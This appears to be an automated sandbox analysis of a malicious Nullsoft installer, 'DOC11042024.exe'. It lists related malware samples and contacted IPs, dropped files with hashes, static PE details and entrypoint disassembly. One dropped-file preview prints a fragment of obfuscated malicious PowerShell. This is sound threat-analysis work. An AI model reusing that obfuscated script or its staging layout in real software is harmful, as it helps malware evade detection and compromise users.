                                                                            SecuriteInfo.com.Win32.RansomX-gen.15724.13250.exeGet hashmaliciousMicroClipBrowse
                                                                            • 149.154.167.220
                                                                            IP0XYLm4Uv.exeGet hashmaliciousStealc, VidarBrowse
                                                                            • 149.154.167.99
                                                                            26HY8aPgae.exeGet hashmaliciousUnknownBrowse
                                                                            • 149.154.167.99
                                                                            czxw4iVMHJ.exeGet hashmaliciousStealc, VidarBrowse
                                                                            • 149.154.167.99
                                                                            HOSTBALTICLTContract #U2116 KB #U2013 08152024 - 1.pif.exeGet hashmaliciousRedLineBrowse
                                                                            • 141.98.10.33
                                                                            PRODUCT OVERVIEW.docGet hashmaliciousUnknownBrowse
                                                                            • 141.98.10.11
                                                                            tppc.elfGet hashmaliciousUnknownBrowse
                                                                            • 141.98.10.95
                                                                            sarm6.elfGet hashmaliciousMiraiBrowse
                                                                            • 141.98.10.95
                                                                            TRIAL IMG_00O0125RDER.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                            • 141.98.10.120
                                                                            1316wjL1Ep.elfGet hashmaliciousUnknownBrowse
                                                                            • 141.98.10.95
                                                                            17213054441f2891f24374c97759e4ac14183d6cfaeabe4240dc8794e61fa899b9e40b62fb429.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                            • 141.98.10.11
                                                                            Demand G2-2024.xlsxGet hashmaliciousFormBookBrowse
                                                                            • 141.98.10.47
                                                                            171232524570452cfc1123de8b7cabf91834cbebe0e4fd1dae96e0b4418fab427bf67de7f5439.dat-decoded.exeGet hashmaliciousRisePro StealerBrowse
                                                                            • 141.98.10.48
                                                                            1712325246bbbf6f1de2af242e599680d3f96095835a7a7584ff1f1f967e4c2d3f319cbbe6606.dat-decoded.exeGet hashmaliciousPrivateLoader, RisePro StealerBrowse
                                                                            • 141.98.10.48
                                                                            CLOUDFLARENETUSsegura.vbsGet hashmaliciousRemcosBrowse
                                                                            • 188.114.96.3
                                                                            file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                            • 188.114.97.3
                                                                            Dbt5vPZaOa.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                            • 188.114.96.3
                                                                            file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                                                            • 188.114.96.3
                                                                            file.exeGet hashmaliciousLummaC, StealcBrowse
                                                                            • 188.114.97.3
                                                                            PO.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                            • 188.114.96.3
                                                                            file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                            • 188.114.96.3
                                                                            MV Sunshine.exeGet hashmaliciousFormBookBrowse
                                                                            • 172.67.206.245
                                                                            file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                            • 188.114.96.3
                                                                            PRICE ENQUIRY - RFQ 6000073650.exeGet hashmaliciousGuLoaderBrowse
                                                                            • 188.114.96.3

                                                                            JA3 Fingerprints

                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                            54328bd36c14bd82ddaa0c04b25ed9adDbt5vPZaOa.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                            • 188.114.96.3
                                                                            PO.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                            • 188.114.96.3
                                                                            Request For Quotation RFQ1310.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                            • 188.114.96.3
                                                                            Quote.exeGet hashmaliciousMassLogger RATBrowse
                                                                            • 188.114.96.3
                                                                            file.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                            • 188.114.96.3
                                                                            Ziraat Bankasi Swift Mesaji.pdf.exeGet hashmaliciousMassLogger RATBrowse
                                                                            • 188.114.96.3
                                                                            Payment Slip_SJJ023639#U00faPDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                            • 188.114.96.3
                                                                            rQUOTATION_NOVQTRA071244__PDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                            • 188.114.96.3
                                                                            Payment info.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                            • 188.114.96.3
                                                                            z79PROFORMAINVOICE.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                            • 188.114.96.3
                                                                            3b5074b1b5d032e5620f69f9f700ff0esegura.vbsGet hashmaliciousRemcosBrowse
                                                                            • 149.154.167.220
                                                                            Dbt5vPZaOa.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                            • 149.154.167.220
                                                                            PO.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                            • 149.154.167.220
                                                                            Payslip_October_2024_pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                                            • 149.154.167.220
                                                                            V7FWuG5Lct.exeGet hashmaliciousQuasarBrowse
                                                                            • 149.154.167.220
                                                                            7ll96oOSBF.exeGet hashmaliciousQuasarBrowse
                                                                            • 149.154.167.220
                                                                            Payload 94.75 (4).225.exeGet hashmaliciousKronos, Strela StealerBrowse
                                                                            • 149.154.167.220
                                                                            VsXpA6fSbk.jsGet hashmaliciousUnknownBrowse
                                                                            • 149.154.167.220
                                                                            VsXpA6fSbk.jsGet hashmaliciousUnknownBrowse
                                                                            • 149.154.167.220
                                                                            lDPmx9XNXu.exeGet hashmaliciousUnknownBrowse
                                                                            • 149.154.167.220

                                                                            Dropped Files

                                                                            No context

                                                                            Created / dropped Files

                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                                                            Download File
                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:data
                                                                            Category:modified
                                                                            Size (bytes):14744
                                                                            Entropy (8bit):4.992175361088568
                                                                            Encrypted:false
                                                                            SSDEEP:384:f1VoGIpN6KQkj2qkjh4iUxehQJKoxOdBMNXp5YYo0ib4J:f1V3IpNBQkj2Ph4iUxehIKoxOdBMNZiA
                                                                            MD5:A35685B2B980F4BD3C6FD278EA661412
                                                                            SHA1:59633ABADCBA9E0C0A4CD5AAE2DD4C15A3D9D062
                                                                            SHA-256:3E3592C4BA81DC975DF395058DAD01105B002B21FC794F9015A6E3810D1BF930
                                                                            SHA-512:70D130270CD7DB757958865C8F344872312372523628CB53BADE0D44A9727F9A3D51B18B41FB04C2552BCD18FAD6547B9FD0FA0B016583576A1F0F1A16CB52EC
                                                                            Malicious:false
                                                                            Reputation:moderate, very likely benign file
                                                                            Preview:PSMODULECACHE.....$...z..Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........$...z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....

                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_d1hca5cb.2l5.ps1

                                                                            Download File
                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:ASCII text, with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):60
                                                                            Entropy (8bit):4.038920595031593
                                                                            Encrypted:false
                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                            Malicious:false
                                                                            Reputation:high, very likely benign file
                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_m3hwvonv.oay.psm1

                                                                            Download File
                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:ASCII text, with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):60
                                                                            Entropy (8bit):4.038920595031593
                                                                            Encrypted:false
                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                            Malicious:false
                                                                            Reputation:high, very likely benign file
                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uwsqjtnc.2zq.ps1

                                                                            Download File
                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:ASCII text, with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):60
                                                                            Entropy (8bit):4.038920595031593
                                                                            Encrypted:false
                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                            Malicious:false
                                                                            Reputation:high, very likely benign file
                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zdkk1w0d.huo.psm1

                                                                            Download File
                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:ASCII text, with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):60
                                                                            Entropy (8bit):4.038920595031593
                                                                            Encrypted:false
                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                            Malicious:false
                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                            C:\Users\user\AppData\Local\Temp\nseE75F.tmp

                                                                            Download File
                                                                            Process:C:\Users\user\Desktop\DOC11042024.exe
                                                                            File Type:data
                                                                            Category:dropped
                                                                            Size (bytes):964090
                                                                            Entropy (8bit):4.764322952518005
                                                                            Encrypted:false
                                                                            SSDEEP:6144:68XTkg5Sb127W/6CBY7g+uwGoPkCfUQtUvr38uJVOAiKY83PqZaPL26LZGSaCjwT:SgsJ/z28+u5HC8jr3v+aDi6lJAYgvL/N
                                                                            MD5:05C2A48278C52703FFA604232A84CC38
                                                                            SHA1:026C93046B1827D117F5E986F75839BEBC407F9A
                                                                            SHA-256:2EFD0227F895EAC9347AC5F9CC58B3835BEE439C2DED4C91EFB73A9E84C255F5
                                                                            SHA-512:654F6966F9853931ED4B89CF1E0FC98039FF46960B9F942E617435592E18067D0B4EAFC0EC38348563DA7DA0105BBB7C56731038371A1E81BF8AA7F920B3CC29
                                                                            Malicious:false
                                                                            Preview:bz......,...............$*.......I......Ly.......z..............................................k...................................M.......................................................................................................................................................G...p...............j...............................................................................................................................b.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                            C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\bestialitet.ini

                                                                            Download File
                                                                            Process:C:\Users\user\Desktop\DOC11042024.exe
                                                                            File Type:ASCII text, with CRLF line terminators
                                                                            Category:dropped
                                                                            Size (bytes):46
                                                                            Entropy (8bit):3.836047762460485
                                                                            Encrypted:false
                                                                            SSDEEP:3:CIK5gN0leKbQA5:LKRe7A5
                                                                            MD5:1CF88EB768688A65B89C8422C4983163
                                                                            SHA1:CEC4C169379A3E69CC44E8711753B5359D2CC130
                                                                            SHA-256:2BF3BC0DA143B165F824BC0A42BEC0903191F04CB6EDD5DF92C441D034717957
                                                                            SHA-512:3F34A000D3001749B58EF64D1C9FABBFCF43B7019FC588D9E123B0A324560D74AF5097F37C98C2CF315CB15C3E4CE47FB79CF4B8AF5AC45AD2BFB0849AC069C2
                                                                            Malicious:false
                                                                            Preview:[stomodaeums]..untransientness=Konditionerne..

                                                                            C:\Users\user\AppData\Roaming\turkeyism\beredskabscentre\Tiderip213\Cemented.spa

                                                                            Download File
                                                                            Process:C:\Users\user\Desktop\DOC11042024.exe
                                                                            File Type:data
                                                                            Category:dropped
                                                                            Size (bytes):49665
                                                                            Entropy (8bit):2.307083160235672
                                                                            Encrypted:false
                                                                            SSDEEP:768:zwmvIL4MR38y/hyuUS7CGDpwwqWtHVJCtHnKxzYbv:zvMRbEZGXOKG
                                                                            MD5:3AFC04CC9C861BC8BC32CD1F35AC5B8A
                                                                            SHA1:7E3BB9EB009650D5580374F3371CCAB0DC332CC5
                                                                            SHA-256:FFA9F7F9E9E9F3F6F52A318FBB1D7AC10A62A144E0A0EA9029681B3D2BC8AC2C
                                                                            SHA-512:086E7DD4D610AAE4B3042F90FCE3E16EFF7A6FA09FD7A161803BC536824B21D90AD160F8E861456C047838FC50CB81AA505B3671559E61D10817BFD7C6CCD758
                                                                            Malicious:false
                                                                            Preview:.........f....._.............;................................................................b...................`.p$.................................=.......<...(..............(..............k...X..................T........................s..(.........N.......X.............................`..............n................O......... ............Y..................................C.................F.............)R.....m...........F........<.%.......h.................3&...................................P.......i...............ZP....U.................6............l.....H.U.R.....................................T...........................Y...R...b.........oI.........................................s..M...................R..\..L.........+.......................................b.......................c..........................v.......].........a...0.......7..............Q........................................Y.X...a.............?......................0C........g............5..........

                                                                            C:\Users\user\AppData\Roaming\turkeyism\beredskabscentre\Tiderip213\Compared.afv

                                                                            Download File
                                                                            Process:C:\Users\user\Desktop\DOC11042024.exe
                                                                            File Type:data
                                                                            Category:dropped
                                                                            Size (bytes):314290
                                                                            Entropy (8bit):2.3014083432260093
                                                                            Encrypted:false
                                                                            SSDEEP:1536:9nNjZMWsSaCpU9leJUsnVA71damwoZBV3TyKX50hVOBNopWlukDGzUnsTEaNjrDF:9NjZGSaCpbFzmBpyGmWlu0sQskXH/sRz
                                                                            MD5:0A673A90442585CF2385C436AA535E6F
                                                                            SHA1:211C84078F9E42B7A0196D942F70F306C786C286
                                                                            SHA-256:31D1875B0180F5E0818102C734A69F61FB818D754077644C6E9A3B740C9592B1
                                                                            SHA-512:F571D9EB8BCCBC3CA2385F8B11E868DEBEF0A10E671219F62CB2A95558609CEDF552E76E618964F17204D745BEC49529B9D0F30FB6A6150D2C9AB5552E6D706F
                                                                            Malicious:false
                                                                            Preview:?.....l................e.;.......<..(...............................@.......U../..........................................................7....,.H.....\....................;.....<.#.............0...............................R.............K.............a.........................%....F.....p.............I............3....So..f.......n............q.fD.......(................]...4............&.......................{.......................=....7.......>.......................................T..............................................&.........O....................................l....G..............................................................................................L..............................D....m..._............................(..k...w..................................$....................Uh.......$.!....A......x..........m.................T....F.........Y........=....J.....}..........U...c.'...C.......4..........................z........................#........

                                                                            C:\Users\user\AppData\Roaming\turkeyism\beredskabscentre\Tiderip213\DOC11042024.exe

                                                                            Download File
                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                            Category:dropped
                                                                            Size (bytes):677344
                                                                            Entropy (8bit):7.701041803336108
                                                                            Encrypted:false
                                                                            SSDEEP:12288:2XJ/BQ9wbOEvCJhy5aFj0MbS9ytLF9vVSaQ5X5X8LfH8+C7uPgITpm:8/rOuCJMyJu9ytBfaM8aPgITpm
                                                                            MD5:2119B4C15A036B7E407A7483A89ECDBF
                                                                            SHA1:37C3C28BBA3F2482E92B3B0EF570C2BA6F3167A8
                                                                            SHA-256:66C79A5E56A0B28126534DED1E9DD50E2DE460FB671C49E7CF7A365568C7067B
                                                                            SHA-512:0DC2FBEC1EED5CDE2BF221C4B95A8CF232FCC922FF8B791CEF8B4E816F7BCCB1EE3C7B4510FC7AA78A74052DBD5694E1CE3ED55765BA8D1358529B9371829C0B
                                                                            Malicious:true
                                                                            Antivirus:
                                                                            • Antivirus: ReversingLabs, Detection: 5%
                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1.D9u.*ju.*ju.*j..ujw.*ju.+j..*j..wjd.*j!..j..*j..,jt.*jRichu.*j........PE..L......Q.................`...*.......3.......p....@..........................P...............................................t...........q...........L...............................................................p...............................text... ^.......`.................. ..`.rdata..T....p.......d..............@..@.data................x..............@....ndata...0...............................rsrc....q.......r...~..............@..@................................................................................................................................................................................................................................................................................................................................................................

                                                                            C:\Users\user\AppData\Roaming\turkeyism\beredskabscentre\Tiderip213\DOC11042024.exe:Zone.Identifier

                                                                            Download File
                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:ASCII text, with CRLF line terminators
                                                                            Category:dropped
                                                                            Size (bytes):26
                                                                            Entropy (8bit):3.95006375643621
                                                                            Encrypted:false
                                                                            SSDEEP:3:ggPYV:rPYV
                                                                            MD5:187F488E27DB4AF347237FE461A079AD
                                                                            SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                            SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                            SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                            Malicious:true
                                                                            Preview:[ZoneTransfer]....ZoneId=0

                                                                            C:\Users\user\AppData\Roaming\turkeyism\beredskabscentre\Tiderip213\Isbjergs.Krs

                                                                            Download File
                                                                            Process:C:\Users\user\Desktop\DOC11042024.exe
                                                                            File Type:ASCII text, with very long lines (4199), with CRLF, LF line terminators
                                                                            Category:dropped
                                                                            Size (bytes):73172
                                                                            Entropy (8bit):5.200798981640251
                                                                            Encrypted:false
                                                                            SSDEEP:1536:k4JKvd5jvoXs5AVOuLKr6LZ6hA08L083/Nkc4DYqT6+aPzHita:k4YHjv2JVOAKrxKz083/NCEqT6+aPzH3
                                                                            MD5:8D96A572DD88752B194CA8CF3F1C042B
                                                                            SHA1:DA71E31E2313456E2B29757609AF4C895BD8A4CF
                                                                            SHA-256:71100EDC195FBAEEB22FC562D5E99A1C36CAD69D8BBE3D446B44B041A8BB9208
                                                                            SHA-512:8648847897D3895233D5C8C71FE911D2529917C6E3E817AAE589726B0979EC7F397C597CD8548C0F2996A70F012786FB7936B78DF70327913C3C82BE9C7D5FF2
                                                                            Malicious:true
                                                                            Preview:$Vandbreres=$ravnemrkencestries;..<#Unhumanise Titalssystemets Rigsrevisionen Slaker Renegade Familiesammenfring #>..<#Davide Unconstrainedness Sygesikringsbevisets metaling Intercolumnation Kredittimer Deemer #>..<#Linjeredigeringen Posrer rentee #>..<#Scheelite Citifies Unturgid Aotes #>..<#Gteskabstilbud Skyggelgningerne Systole Morpholoical Velrt Trachled #>..<#Dekanter Cervus Licenced #>...$biografteatres = @'. Piscic. Be ali$ gradeyLStarbaauUndereamSlido.eb N nvire BetvanrInamovaeAnafortr Slump,=Dommeda$Revolutrr bblelaCockardvSkidwaynTheatrieTapnetkmOverdrar Ludicrk WilleteSvo.lhalatramenk UnpartaDom.ticl UndigeiSektiongEllesteeThac ednSindsbe;,aveeje. VespbrfLdermapuguanabanOviformcResurfat RecommiUdstopgoIndsbnin Dds am H atstrJ Outfl oWauc twlJudais l RiegliiCoccothfBaryl by Sk,lee afp ikk(Veltilp$GaslighrUnfina at pdresvSvanhopnAmmeundeSalmonem TillgsrPregu rk semipre Be tod, Klo kk$BoffolaWTrommesiSbenstirFuraldee ephlegwOvermoiounsteelrnonsenskPo rerfi SkrmennUna,progdisc.

                                                                            C:\Users\user\AppData\Roaming\turkeyism\beredskabscentre\Tiderip213\Unsleeved.Unb

                                                                            Download File
                                                                            Process:C:\Users\user\Desktop\DOC11042024.exe
                                                                            File Type:data
                                                                            Category:dropped
                                                                            Size (bytes):291130
                                                                            Entropy (8bit):7.683492297887796
                                                                            Encrypted:false
                                                                            SSDEEP:6144:rTkg5Sb127W/6CBY7g+uwGoPkCfUQtUvr3D:cgsJ/z28+u5HC8jr3D
                                                                            MD5:106631F3FE8B1466CF81F6034D7D5B01
                                                                            SHA1:EFBF5BD218889AA0ECDCB1D99285F68F04DA0DAE
                                                                            SHA-256:6BAC90C8E5B6BA1851F4E18C1FD305B1826B7A726D2E00D2D2ECB9D68E0070E0
                                                                            SHA-512:38A7AE0B34E536BCE3F00D988B03F04A3B06FD823B418FABED8A75E84E6DB24D7EDA712BCA31AF25E4B73C63E030CCE6A57111C871B72D0621378B8E55EF5ADF
                                                                            Malicious:false
                                                                            Preview:..}}..........S....///.................m.......n..................FF....fff...aaa...{...r..33............../.............y..........................................................4......xxx...S.................W...333.............:...........??......8............KKK........HHH........".........a......?.ZZZZ.........e.......ii............................5..333.#..mmmm......Z...............D.'.vv...qqq..........................PPPP.|......................H..........77...k............??.y.....[.....PPP.......g.O...w....ZZZ..................ttttt...........O........y......dd........................QQQ.........................................................RRR........................................ee............^...EEEEE.................VVVVVV.0...Y..........a..LL................PP.yyy........Y.......ii.f.................................vvv...........j.++.f.............NNNN.........................j......oo....N...11....w.**.........4.......................9.QQ..d........................

                                                                            C:\Users\user\AppData\Roaming\turkeyism\beredskabscentre\Tiderip213\forsvarspolitiske.txt

                                                                            Download File
                                                                            Process:C:\Users\user\Desktop\DOC11042024.exe
                                                                            File Type:ASCII text, with very long lines (311), with CRLF line terminators
                                                                            Category:dropped
                                                                            Size (bytes):555
                                                                            Entropy (8bit):4.296685115633425
                                                                            Encrypted:false
                                                                            SSDEEP:12:ipTcM6gXrr+RfAo1YO9d0/0JaUEYi4gxMupNF6+y3Jv6quABQ7v2y:ilAuOfAjOUcJa/AdE6+mv6PABQ7vX
                                                                            MD5:05A5C3B4A770ACA6FC2F47CC40847FA5
                                                                            SHA1:59E660F036F9CC982F01179F13348B498B9E924B
                                                                            SHA-256:B12CD7400A5A2EE6E9BEF2994FD82B1650DD98C7238028E22B082C5D6AB87288
                                                                            SHA-512:3F4A3D7D098EF0E8257C78EA00E2F51D1F6FD37AD73EF31D460D3B5B07E2688E40D1921A0DBBD5B9B10D1AF6D80B823D1EA615F13A8288B5957899CAE75D5396
                                                                            Malicious:false
                                                                            Preview:leon uncereclothed kancellilaud fortrolighedernes feminists ozone mandslingernes antitragicus..udrugningens dramshop sanctions moochulka inhumanity bdelloura pernittengrynens mahmouds forsvarsvrks whilie sangsvanes undertrykkelsen portifory..uncombustible smugryg counterpaled,preprocessorerne tragtningen nonnecessity,weakhearted printertilslutning masturbationers formbling overrigorousness forfriskende expandor.alumnae aber unamplified gullyhole nabbers forlystende hviskene ndk forundringers kulturkredsenes geognostical allemontite tilstraekkelige..

                                                                            C:\Users\user\AppData\Roaming\turkeyism\beredskabscentre\Tiderip213\omers.cli

                                                                            Download File
                                                                            Process:C:\Users\user\Desktop\DOC11042024.exe
                                                                            File Type:data
                                                                            Category:dropped
                                                                            Size (bytes):203920
                                                                            Entropy (8bit):2.2879778729381077
                                                                            Encrypted:false
                                                                            SSDEEP:1536:+xN56/s/mfDvxSumcvrZLyhKjXAvtXUcmXEWsCn/N:+LM/s/odTvrZWwcGn/N
                                                                            MD5:2AEF25928E999FB8C6A2C1E850974F3E
                                                                            SHA1:1CE656A158733656455170146DA1660926E4A4A9
                                                                            SHA-256:936985B28A39966CD962AD8CD7DEDC0146DA1A2F19895C7F0DF638922282A3CD
                                                                            SHA-512:6A4AC11D6E3F97B2F1CCA65BE2DF6E5C5FAF97C92E31EBC6FD6FAF589D40A75E384FCFE7DBB0FAC2EA11BF950B9C0A8A956F587B1B61D4EC80EED2D33D35FE70
                                                                            Malicious:false
                                                                            Preview:.U...........8.................iZ.....>...................."................[........................................*.....!..................s......k............z......+..............\.'........}..................*.....E..................5.....@.......................=....................].....................d....................G.............t.....B.................................u..q.................f................n.r............................#......t..............................................q....;........C...........>...........<...........................J.......!...>.........................N......b.....................R....=.....X..................K..........................Z..........c..................................................................i.......28...=.$j......%.......................i......................../.................L...d.E...........................................HV......L.........d.....c...........................q...........................

                                                                            Static File Info

                                                                            General

                                                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                            Entropy (8bit):7.701041803336108
                                                                            TrID:
                                                                            • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                                                            • DOS Executable Generic (2002/1) 0.02%
                                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                            File name:DOC11042024.exe
                                                                            File size:677'344 bytes
                                                                            MD5:2119b4c15a036b7e407a7483a89ecdbf
                                                                            SHA1:37c3c28bba3f2482e92b3b0ef570c2ba6f3167a8
                                                                            SHA256:66c79a5e56a0b28126534ded1e9dd50e2de460fb671c49e7cf7a365568c7067b
                                                                            SHA512:0dc2fbec1eed5cde2bf221c4b95a8cf232fcc922ff8b791cef8b4e816f7bccb1ee3c7b4510fc7aa78a74052dbd5694e1ce3ed55765ba8d1358529b9371829c0b
                                                                            SSDEEP:12288:2XJ/BQ9wbOEvCJhy5aFj0MbS9ytLF9vVSaQ5X5X8LfH8+C7uPgITpm:8/rOuCJMyJu9ytBfaM8aPgITpm
                                                                            TLSH:53E40252A45450DBED7A57B16C3B4C5816A32E7EEDF0A40E669AB63113B33E3005BE0F
                                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1.D9u.*ju.*ju.*j..ujw.*ju.+j..*j..wjd.*j!..j..*j..,jt.*jRichu.*j........PE..L......Q.................`...*.......3.......p....@

                                                                            File Icon

                                                                            Icon Hash:4f19194767674101

                                                                            Static PE Info

                                                                            General

                                                                            Entrypoint:0x40331c
                                                                            Entrypoint Section:.text
                                                                            Digitally signed:true
                                                                            Imagebase:0x400000
                                                                            Subsystem:windows gui
                                                                            Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                            DLL Characteristics:TERMINAL_SERVER_AWARE
                                                                            Time Stamp:0x51E3058B [Sun Jul 14 20:09:47 2013 UTC]
                                                                            TLS Callbacks:
                                                                            CLR (.Net) Version:
                                                                            OS Version Major:4
                                                                            OS Version Minor:0
                                                                            File Version Major:4
                                                                            File Version Minor:0
                                                                            Subsystem Version Major:4
                                                                            Subsystem Version Minor:0
                                                                            Import Hash:17b7d61bda0f7478e36d9ce3d4170680

                                                                            Authenticode Signature

                                                                            Signature Valid:false
                                                                            Signature Issuer:CN=fosterstilling, O=fosterstilling, L=Jackson, C=US
                                                                            Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
                                                                            Error Number:-2146762487
                                                                            Not Before, Not After
                                                                            • 23/02/2024 05:00:37 22/02/2027 05:00:37
                                                                            Subject Chain
                                                                            • CN=fosterstilling, O=fosterstilling, L=Jackson, C=US
                                                                            Version:3
                                                                            Thumbprint MD5:F01335F1BBCDDA054CFC73801B801AC7
                                                                            Thumbprint SHA-1:20489A372C20054E55FCD8D377FB5209E1B97F81
                                                                            Thumbprint SHA-256:79CCAB53CAE0477AF1C90C8B1B7BE5CC3A75B0A30AD5E35682FF4D51A262FD7E
                                                                            Serial:08E03876D97903A4BA903A213932262ED8F9D0D3

                                                                            Entrypoint Preview

                                                                            Instruction
                                                                            sub esp, 000002D4h
                                                                            push ebx
                                                                            push ebp
                                                                            push esi
                                                                            push edi
                                                                            push 00000020h
                                                                            xor ebp, ebp
                                                                            pop esi
                                                                            mov dword ptr [esp+14h], ebp
                                                                            mov dword ptr [esp+10h], 00409230h
                                                                            mov dword ptr [esp+1Ch], ebp
                                                                            call dword ptr [00407034h]
                                                                            push 00008001h
                                                                            call dword ptr [004070BCh]
                                                                            push ebp
                                                                            call dword ptr [004072ACh]
                                                                            push 00000008h
                                                                            mov dword ptr [00429298h], eax
                                                                            call 00007F3FDCE0EC42h
                                                                            mov dword ptr [004291E4h], eax
                                                                            push ebp
                                                                            lea eax, dword ptr [esp+34h]
                                                                            push 000002B4h
                                                                            push eax
                                                                            push ebp
                                                                            push 00420690h
                                                                            call dword ptr [0040717Ch]
